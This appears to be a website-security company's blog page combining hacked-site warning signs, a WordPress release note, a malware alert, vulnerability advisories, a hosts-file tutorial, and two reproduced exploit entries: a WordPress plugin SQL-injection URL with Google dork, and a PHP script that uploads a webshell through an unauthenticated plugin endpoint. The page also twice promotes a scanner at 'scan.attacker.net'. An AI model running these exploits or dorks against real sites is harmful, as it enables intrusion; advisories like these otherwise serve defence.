How to Tell if Your Website Has Been Hacked

How to tell if your website has been hacked?

  • Do you see any strange, unrecognized or inappropriate content on your site?
  • Your site started consuming more resources or running slow?
  • Do you see unrecognized users, admin users, FTP or email accounts on your site?
  • Unrecognized files or folders?
  • Customer reporting stolen credit card after purchasing something from your website?
  • Google Chrome, Firefox or other browsers showing a red warning when visiting your website?
  • Do you see any unrecognized ads, popups or redirects to other sites?
  • Your hosting provider suspended your hosting account?
  • If your site is listed as hacked or harmful in Google searches.
  • If you recieve a warning from Google webmaster tools or other blacklists.
  • If Google Adwords suspended your running Ads.

There are so many other signs! Signup now and let’s clean & protect your websites!

You can check your website’s security by using this free website malware scanner https://scan.attacker.net

WordPress 5.0.3 is now available!

5.0.3 is a maintenance release that includes 37 bug fixes and 7 performance updates. The focus of this release was fine-tuning the new block editor, and fixing any major bugs or regressions.

Here are a few of the highlights:

For a full list of changes, please consult the list of tickets on Trac, changelog, or read a more technical summary on the Make WordPress Core blog.

You can download WordPress 5.0.3 or visit Dashboard → Updates on your site and click Update Now. Sites that support automatic background updates have already started to update automatically.

A new wave of the simpleoneline Malware

A new wave of the https://simpleoneline[.]online/online.js malware has been discovered hitting hundreds of WordPress websites. In most cases, it’s injected in the database and particularly found in the options table.

Check if your website is infected using this free malware scanner:

https://scan.attacker.net

#malware #simpleoneline #security #hosting #malware #removal #hacked #wordpress #cpanel #joomla #drupal #magento #Security #webhosting #linux #plesk #directadmin

WordPress theme directory traversal

Directory traversal vulnerability in the Elegant Themes Divi theme for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the img parameter in a revslider_show_image action to wp-admin/admin-ajax.php.

 

 

Timeline

February 11, 2015 NVD published advisory

Authority references

Exploits

 

WordPress plug-in arbitrary code execution

Multiple cross-site scripting (XSS) vulnerabilities in the Spider Facebook plugin before 1.0.11 for WordPress allow (1) remote attackers to inject arbitrary web script or HTML via the appid parameter in a registration task to the default URI or remote administrators to inject arbitrary web script or HTML via the (2) asc_or_desc, (3) order_by, (4) page_number, (5) serch_or_not, or (6) search_events_by_title parameter in (a) the Spider_Facebook_manage page to wp-admin/admin.php or a (b) selectpagesforfacebook or (c) selectpostsforfacebook action to wp-admin/admin-ajax.php.

 

How can I test or preview my website before switching DNS?

 

  1. Locate the HOSTS file on your computer. Typically it is in one of the following locations:
    • Windows NT/2000/XP/2003/Vista/7 – C:\windows\system32\drivers\etc\hosts
    • Windows 95/98/Me – C:\windows\hosts
  2. Open this file with a text editor such as Notepad or Wordpad.
    • Right-click on Notepad and select the option to Run as Administrator – otherwise you may not be able to open this file.Then, open the file. Consider performing a “Save As” so you have an original copy of the file that you can restore later. You will see two columns of information, the first containing IP addresses and the second containing host names. By default, a windows hosts file should be similar to the following:
      (In Windows 7 Press and hold Ctrl+Shift while opening the Notepad/Wordpad).

    • Filename: hosts

      127.0.0.1 localhost


      You can add additional lines to this file that will point requests for a particular domain to your new server’s IP address.

      Example:


      Filename: hosts

      127.0.0.1 localhost
      123.123.123.123 example.com

  3. Save your changes (be sure to save as a host file, not as a text file).
    Windows wants to save it as text (.txt) so you need to

    1. Change save as type to all files and then
    2. Click on host  (the original file).
  4. Restart any currently open browsers.
  5. You may also want to flush your DNS cache. In Windows XP, go to Start, and then Run, then type “cmd” and hit enter.
    Type the following:ipconfig /flushdns
  6. In your web browser you should see your site as it appears on your testing server when typing http://example.com/ but still be able to see the site on its current web server by visiting http://www.example.com/

How to Edit Your Hosts File on an Apple Macintosh Using Mac OSX

Let us assume for this example your testing server has an IP address 123.123.123.123 and you wish to visit that server when you type “http://example.com” into a web browser BUT still wish to still see the site as the rest of World Wide Web does when you enter “http://www.example.com” into your browser instead.

  1. Open Terminal, which is in Applications, then the Utilities folder. To do this go to the Finder (Desktop) and from the main main bar at the top of the screen choose “Go” and then “Utilities”. Find the Terminal application icon and double click.
  2. You may want to first make a backup copy of your existing hosts file:
    sudo cp /private/etc/hosts /private/etc/hosts-orig

    Enter your user password at the prompt.Then type the following command to edit your hosts file:

    sudo nano /private/etc/hosts

    Enter your user password at the prompt if asked.

  3. You will see a file with contents similar to the following:

    Filename: hosts

    ##

    # Host Database

    #

    # localhost is used to configure the loopback interface

    # when the system is booting. Do not change this entry.

    ##

    127.0.0.1 localhost

    255.255.255.255 broadcasthost

    ::1 localhost

    fe80::1%lo0 localhost

    Using the arrow keys on your keyboard, navigate around this file an add your domain and IP address to the bottom of the file. For example:


    Filename: hosts

    ### Host Database## localhost is used to configure the loopback interface# when the system is booting. Do not change this entry.##127.0.0.1 localhost

    255.255.255.255 broadcasthost

    ::1 localhost

    fe80::1%lo0 localhost

    123.123.123.123 example.com


  4. When done editing the hosts file, press the keyboard combination Control+O to save the file.
    Then press the Enter on the filename prompt to confirm the Save operation. Finally press the keyboard combination Control-X to exit the editor.You may also need to grant yourself sudo priveleges, if you got a permission error in Step 2. In your “Help” menu, search for “root” and select the instructions for “Enabling the root user.” Follow those instructions.
  5. Restart any currently open browsers. You may also want to flush your DNS cache.
    Type the following command into your Terminal window:dscacheutil -flushcache
  6. In your web browser you should see your site as it appears on your testing server when typing http://example.com/ but still be able to see the site on its current web server by visiting http://www.example.com/

WHMCS SQL injection Exploit

** A patch was released. See http://blog.whmcs.com/?t=80223  

WHMCS, a popular billing/support/customer management system, is still suffering from critical SQL injection issues. Today, yet another vulnerability, including exploit was released. 

Due to the fact that there is no patch available at this point, I will refrain from linking to any exploit details, but it is pretty trivial to find the respective blog post which includes a script to exploit the vulnerability. WHMCS acknowledged the problem.

The root cause of this problem, as well as prior problems with the software, appears to be a lack in understanding of proper controls to prevent SQL injection. Good input validation is just a start, but prepared statements are a must. Instead, the WHMCS developers used a rather complex (and buggy) function to escape user input and assemble dynamic SQL queries.

The bug is in a function used throughout WHMCS, so the exploit is not limited to a particular URL.

http://blog.whmcs.com/?t=80206

WordPress WP Realty Plugin – Blind SQL Injection

# Exploit Title: WordPress - wp-realty - MySQL Time Based Injection

# Google Dork: inurl:"/wp-content/plugins/wp-realty/"
# Vendor: http://wprealty.org/
# Date: 10/08/2013
# Exploit Author: Napsterakos
Link: http://localhost/wordpress/wp-content/plugins/wp-realty/
Exploit: http://localhost/wordpress/wp-content/plugins/wp-realty/index_ext.php?action=contact_friend&popup=yes&listing_id=[SQLi]

WordPress Plugin Complete Gallery Manager 3.3.3 – Arbitrary File Upload Vulnerability

A arbitrary file upload web vulnerability is detected in the CodeCanyon WordPress Plugin Complete Gallery Manager v3.3.3 Web-Application.

The vulnerability allows remote attackers to upload files via POST method with multiple extensions to unauthorized access them on
application-side of the service.
The vulnerability is located in the /plugins/complete-gallery-manager/frames/ path when processing to upload via the  upload-images.php
file own malicious context or webshells. After the upload the remote attacker can access the file with one extension and exchange it with the
other one to execute for example php codes.
Exploitation of the vulnerability requires no user interaction and also without privilege application user account (no password standard).
Successful exploitation of the vulnerability results in unauthorized path or file access via local file include or arbitrary file upload.
Vulnerable Application(s):
                [+] CodeCanyon - Complete Gallery Manager
Vulnerable Module(s):
                [+] Image File Upload
Vulnerable File(s):
                [+] upload-images.php
Affected Module(s):
                [+] Application Index Listing (http://localhost:8000/)
Proof of Concept:
=================
The arbitrary file upload web vulnerability can be exploited by remote attackers without user interaction or privileged application user account.
For demonstration or reproduce ...
Vuln page :
http://wordpress.localhost:8080/wordpress/wp-content/plugins/complete-gallery-manager/frames/upload-images.php
Exploit :
<?php
$uploadfile="up.php";
$ch = curl_init("http://wordpress.localhost:8080/wordpress/wp-content/plugins/complete-gallery-manager/frames/upload-images.php");
curl_setopt($ch, CURLOPT_POST, true);  
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Upload Access Path : http://wordpress.localhost:8080/wp-content/2013/09/up.php
Google Dork: allinurl:/wp-content/plugins/complete-gallery-manager/
Reference(s):
http://xxx.com/wp-content/plugins/complete-gallery-manager/frames/upload-images.php
http://www.xxx.com/wp-content/plugins/complete-gallery-manager/frames/upload-images.php
http://xxx.org/wp-content/plugins/complete-gallery-manager/frames/upload-images.php
Risk:
=====
The security risk of the arbitrary file upload web vulnerability is estimated as high(+).